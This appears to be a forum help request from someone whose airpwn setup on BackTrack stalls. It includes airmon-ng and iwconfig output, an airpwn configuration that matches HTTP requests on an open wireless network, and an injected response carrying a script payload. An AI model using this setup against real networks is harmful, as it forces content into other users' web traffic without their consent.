ok I am still having problems. Ok heres what I ran in the terminal.
Code:
bt ~ # airmon-ng stop ath0;airmon-ng start wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
eth0 Broadcom bcm43xx
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Interface Chipset Driver
wifi0 Atheros madwifi-ng
eth0 Broadcom bcm43xx
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
bt ~ # iwconfig
lo no wireless extensions.
eth0 IEEE 802.11b/g ESSID:"Wrzesniak" Nickname:"Broadcom 4318"
Mode:Managed Frequency=2.437 GHz Access Point: 00:40:10:10:00:03
Bit Rate=24 Mb/s Tx-Power=18 dBm
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=51/100 Signal level=-57 dBm Noise level=-73 dBm
Rx invalid nwid:0 Rx invalid crypt:1 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
eth1 no wireless extensions.
wifi0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.457 GHz Access Point: 00:0F:B5:AA:A4:05
Bit Rate:0 kb/s Tx-Power:19 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-91 dBm Noise level=-91 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bt ~ # airpwn -c /conf/xss_attack -i ath0 -d madwifing -v -v -v
Parsing configuration file..
Opening command socket..
Opening monitor socket..
Opening injection socket..
LORCON - tx80211_setmode(...) is deprecated, please use tx80211_setfunctionalmode(...) instead
Error setting monitor mode for interface .
Listening for packets...
Channel changing thread starting..
And it just stays at channel changing thread starting....
Here is the conf life located in/conf folder
Code:
begin xss attack
match ^(GET|POST)
ignore ^GET [^ ?]+\.(jpg|jpeg|gif|png|tiff|tif)
response /content/xss_content
here is the other file in the /content file
Code:
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<html>
<head><title></title></head>
<body>
<script>alert(?XSSed?);</script>
</body></html> <!--